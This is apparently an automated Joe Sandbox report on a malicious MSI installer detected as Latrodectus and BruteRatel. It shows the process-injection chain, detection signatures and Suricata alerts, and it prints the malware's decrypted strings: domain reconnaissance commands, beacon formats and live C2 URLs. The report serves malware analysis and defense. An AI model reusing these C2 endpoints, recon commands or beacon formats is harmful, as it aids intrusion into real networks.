Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lavi.msi

Overview

General Information

Sample name:lavi.msi
Analysis ID:1555052
MD5:c65899e2519f4ad21fb4b97f0a113362
SHA1:a1f854c29a69c19949499fca5e24b02b97be46fd
SHA256:025abbec1724b9180b369fe116da9d90ae47a4996f6a4e28e8a947bac1e0c741
Tags:msiuser-pr0xylife
Infos:

Detection

BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7812 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavi.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7892 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 43BC20CBC49545F265F1331995ABDA6D MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI2701.tmp (PID: 8028 cmdline: "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Eta", "Campaign ID": 4037194951}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_2Yara detected BruteRatelJoe Security
        0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          Process Memory Space: rundll32.exe PID: 8104JoeSecurity_BruteRatel_2Yara detected BruteRatelJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: RunDLL32 Spawning Explorer
            Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\apptext.dll, Object, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8104, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4084, ProcessName: explorer.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T10:59:33.580098+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849706TCP
            2024-11-13T11:00:14.462381+010020229301A Network Trojan was detected172.202.163.200443192.168.2.858082TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T11:02:03.714625+010020283713Unknown Traffic192.168.2.858086172.67.191.232443TCP
            2024-11-13T11:02:07.268279+010020283713Unknown Traffic192.168.2.858087172.67.191.232443TCP
            2024-11-13T11:02:10.283737+010020283713Unknown Traffic192.168.2.858088172.67.191.232443TCP
            2024-11-13T11:02:13.168299+010020283713Unknown Traffic192.168.2.858089172.67.191.232443TCP
            2024-11-13T11:02:16.484077+010020283713Unknown Traffic192.168.2.858090172.67.191.232443TCP
            2024-11-13T11:02:20.188077+010020283713Unknown Traffic192.168.2.858091172.67.191.232443TCP
            2024-11-13T11:02:22.999986+010020283713Unknown Traffic192.168.2.858092172.67.191.232443TCP
            2024-11-13T11:02:25.685711+010020283713Unknown Traffic192.168.2.858093172.67.191.232443TCP
            2024-11-13T11:02:28.465289+010020283713Unknown Traffic192.168.2.858094172.67.191.232443TCP
            2024-11-13T11:02:31.244083+010020283713Unknown Traffic192.168.2.858095172.67.191.232443TCP
            2024-11-13T11:02:33.980071+010020283713Unknown Traffic192.168.2.858096172.67.191.232443TCP
            2024-11-13T11:02:36.615479+010020283713Unknown Traffic192.168.2.858097172.67.191.232443TCP
            2024-11-13T11:02:39.128499+010020283713Unknown Traffic192.168.2.858098172.67.191.232443TCP
            2024-11-13T11:02:42.362240+010020283713Unknown Traffic192.168.2.858100172.67.191.232443TCP
            2024-11-13T11:02:45.124335+010020283713Unknown Traffic192.168.2.858101172.67.191.232443TCP
            2024-11-13T11:02:47.841462+010020283713Unknown Traffic192.168.2.858102172.67.191.232443TCP
            2024-11-13T11:02:50.512085+010020283713Unknown Traffic192.168.2.858103172.67.191.232443TCP
            2024-11-13T11:02:53.401221+010020283713Unknown Traffic192.168.2.858104172.67.191.232443TCP
            2024-11-13T11:02:56.355343+010020283713Unknown Traffic192.168.2.858105172.67.191.232443TCP
            2024-11-13T11:02:59.151142+010020283713Unknown Traffic192.168.2.858106172.67.191.232443TCP
            2024-11-13T11:03:02.236881+010020283713Unknown Traffic192.168.2.858107172.67.191.232443TCP
            2024-11-13T11:03:05.299439+010020283713Unknown Traffic192.168.2.858108172.67.191.232443TCP
            2024-11-13T11:03:08.311583+010020283713Unknown Traffic192.168.2.858109172.67.191.232443TCP
            2024-11-13T11:03:11.897932+010020283713Unknown Traffic192.168.2.858110172.67.191.232443TCP
            2024-11-13T11:03:15.448359+010020283713Unknown Traffic192.168.2.858111172.67.191.232443TCP
            2024-11-13T11:03:18.492050+010020283713Unknown Traffic192.168.2.858112172.67.191.232443TCP
            2024-11-13T11:03:21.409415+010020283713Unknown Traffic192.168.2.858114172.67.191.232443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T11:02:03.752840+010020487351A Network Trojan was detected192.168.2.858086172.67.191.232443TCP
            2024-11-13T11:02:09.570724+010020487351A Network Trojan was detected192.168.2.858087172.67.191.232443TCP
            2024-11-13T11:02:12.418373+010020487351A Network Trojan was detected192.168.2.858088172.67.191.232443TCP
            2024-11-13T11:02:15.758465+010020487351A Network Trojan was detected192.168.2.858089172.67.191.232443TCP
            2024-11-13T11:02:19.491450+010020487351A Network Trojan was detected192.168.2.858090172.67.191.232443TCP
            2024-11-13T11:02:22.228995+010020487351A Network Trojan was detected192.168.2.858091172.67.191.232443TCP
            2024-11-13T11:02:24.993858+010020487351A Network Trojan was detected192.168.2.858092172.67.191.232443TCP
            2024-11-13T11:02:27.739909+010020487351A Network Trojan was detected192.168.2.858093172.67.191.232443TCP
            2024-11-13T11:02:30.572059+010020487351A Network Trojan was detected192.168.2.858094172.67.191.232443TCP
            2024-11-13T11:02:33.251417+010020487351A Network Trojan was detected192.168.2.858095172.67.191.232443TCP
            2024-11-13T11:02:35.921884+010020487351A Network Trojan was detected192.168.2.858096172.67.191.232443TCP
            2024-11-13T11:02:38.445231+010020487351A Network Trojan was detected192.168.2.858097172.67.191.232443TCP
            2024-11-13T11:02:41.675497+010020487351A Network Trojan was detected192.168.2.858098172.67.191.232443TCP
            2024-11-13T11:02:44.403551+010020487351A Network Trojan was detected192.168.2.858100172.67.191.232443TCP
            2024-11-13T11:02:47.142344+010020487351A Network Trojan was detected192.168.2.858101172.67.191.232443TCP
            2024-11-13T11:02:49.821123+010020487351A Network Trojan was detected192.168.2.858102172.67.191.232443TCP
            2024-11-13T11:02:52.623944+010020487351A Network Trojan was detected192.168.2.858103172.67.191.232443TCP
            2024-11-13T11:02:55.224697+010020487351A Network Trojan was detected192.168.2.858104172.67.191.232443TCP
            2024-11-13T11:02:58.374492+010020487351A Network Trojan was detected192.168.2.858105172.67.191.232443TCP
            2024-11-13T11:03:01.524516+010020487351A Network Trojan was detected192.168.2.858106172.67.191.232443TCP
            2024-11-13T11:03:04.592517+010020487351A Network Trojan was detected192.168.2.858107172.67.191.232443TCP
            2024-11-13T11:03:07.619002+010020487351A Network Trojan was detected192.168.2.858108172.67.191.232443TCP
            2024-11-13T11:03:11.207625+010020487351A Network Trojan was detected192.168.2.858109172.67.191.232443TCP
            2024-11-13T11:03:14.603701+010020487351A Network Trojan was detected192.168.2.858110172.67.191.232443TCP
            2024-11-13T11:03:17.830438+010020487351A Network Trojan was detected192.168.2.858111172.67.191.232443TCP
            2024-11-13T11:03:20.528808+010020487351A Network Trojan was detected192.168.2.858112172.67.191.232443TCP
            2024-11-13T11:03:23.232250+010020487351A Network Trojan was detected192.168.2.858114172.67.191.232443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://xomamox.com:8877/49Avira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/gump.phpxAvira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/gump.phpAvira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/forest.phplAvira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/forest.phpAvira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/reAvira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/gump.php-Avira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/Avira URL Cloud: Label: malware
            Source: https://xomamox.com/Avira URL Cloud: Label: malware
            Source: https://xomamox.com:8877/TAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Eta", "Campaign ID": 4037194951}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Sample uses string decryption to hide its real strings
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c ipconfig /all
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c systeminfo
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c nltest /domain_trusts
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c net view /all
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c net view /all /domain
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &ipconfig=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c net config workstation
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /c whoami /groups
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &systeminfo=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &domain_trusts=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &domain_trusts_all=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &net_view_all_domain=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &net_view_all=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &net_group=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &wmic=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &net_config_ws=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &net_wmic_av=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &whoami_group=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "pid":
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "%d",
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "proc":
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "%s",
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "subproc": [
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &proclist=[
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "pid":
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "%d",
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "proc":
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "%s",
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "subproc": [
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &desklinks=[
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: *.*
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "%s"
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Update_%x
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Custom_update
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: .dll
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: .exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Error
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: runnung
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %s/%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: front
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: /files/
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Eta
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Cookie:
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: POST
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: GET
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: curl/7.88.1
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: CLEARURL
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: URLS
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: COMMAND
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: ERROR
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: SS7XhbPzgfVM1dzNk6a5t4GCj2QHTzkG4lzOwmFYgoDfGJT1jsnOCzxmYz5jacET
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: [{"data":"
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: "}]
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &dpost=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: https://rolefenik.com/test/
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: https://ergiholim.com/test/
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: \*.dll
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: AppData
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Desktop
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Startup
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Personal
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Local AppData
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: <html>
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: <!DOCTYPE
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %s%d.dll
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Content-Length: 0
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Content-Type: application/dns-message
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: 12345
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: 12345
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &stiller=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %s%d.exe
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %x%x
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &mac=
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %02x
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: :%02x
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &computername=%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: &domain=%s
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: LogonTrigger
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: \Registry\Machine\
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: TimeTrigger
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: PT0H%02dM
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: PT0S
            Source: 11.0.explorer.exe.2be0000.0.raw.unpackString decryptor: \update_data.dat
            Source: unknownHTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58086 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.191.232:443 -> 192.168.2.8:58097 version: TLS 1.2
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004FAF79 FindFirstFileExW,4_2_004FAF79
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,11_2_02BEA8E0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04B8 FindFirstFileA,11_2_02BF04B8
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04C0 FindFirstFileW,11_2_02BF04C0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,11_2_02BE2B28

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58098 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58101 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58096 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58093 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58090 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58088 -> 172.67.191.232:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.8:58102 -> 172.67.191.232:443
